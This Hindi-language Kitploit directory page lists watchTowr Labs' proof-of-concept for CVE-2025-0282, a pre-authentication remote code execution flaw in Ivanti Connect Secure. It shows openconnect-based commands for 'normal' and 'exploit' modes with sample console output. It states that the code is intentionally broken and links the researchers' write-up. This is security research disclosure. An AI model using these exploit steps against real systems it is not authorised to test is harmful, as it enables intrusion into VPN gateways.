Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-0282 — Ivanti Connect Secure IFT TLS स्टैक ओवरफ़्लो प्री-ऑथ RCE (CVE-2025-0282) | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/cve-2025-0282
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubwatchtowrlabs/cve-2025-0282

CVE-2025-0282

Ivanti Connect Secure IFT TLS स्टैक ओवरफ़्लो प्री-ऑथ RCE (CVE-2025-0282)

रिपॉजिटरी देखें
31101 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-0282

Ivanti Connect Secure IFT TLS स्टैक ओवरफ्लो प्री-ऑथ RCE (CVE-2025-0282)

यह जानबूझकर गैर-तुच्छ तरीकों से तोड़ा गया है और इसे काम करने के लिए प्रयास की आवश्यकता होगी, जैसा कि पहले हमारी एक्सप्लॉइटेशन तकनीक ब्लॉगपोस्ट में बताया गया है।

इस भेद्यता को समझने के लिए, आप हमारी तकनीकी राइट-अप देख सकते हैं।

एक्सप्लॉइटेशन वॉकथ्रू और तकनीकें - Ivanti Connect Secure RCE (CVE-2025-0282)

PoC

कोड दो मोड में काम करता है:

  1. सामान्य मोड
  2. एक्सप्लॉइट मोड

"Normal" मोड में कोड चलाकर शुरू करें। यदि आपको पासवर्ड प्रॉम्प्ट मिलता है, तो यह इंगित करता है कि लक्ष्य कार्यशील है। फिर, "Exploit" मोड पर स्विच करें। यदि आप "Failed to complete authentication" संदेश देखते हैं, तो लक्ष्य संभावित रूप से असुरक्षित हो सकता है। ध्यान दें कि एक्सप्लॉइट कोड में हार्डकोडेड एड्रेस और ऑफसेट शामिल हैं, जिन्हें आपको अपने स्वीकृत लक्ष्य के साथ काम करने के लिए संशोधित करना होगा।

सामान्य मोड में अपेक्षित परिणाम:

root@kitploit:~
MODE=normal ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Enter user credentials:
Password:

एक्सप्लॉइट मोड में अपेक्षित परिणाम:

root@kitploit:~
MODE=exploit ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Failed to read from TLS/DTLS socket: Error in the pull function.
Failed to complete authentication

 [!] Target might be vulnerable

एक्सप्लॉइट लेखक

यह एक्सप्लॉइट watchTowr (@watchtowrcyber) के Sina Kheirkhah (@SinSinology) द्वारा लिखा गया था।

संदर्भ

openconnect प्रोजेक्ट, जिस पर यह कोड आधारित है

watchTowr Labs को फॉलो करें

नवीनतम सुरक्षा शोध के लिए watchTowr Labs टीम को फॉलो करें।

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
टूल डाउनलोड करें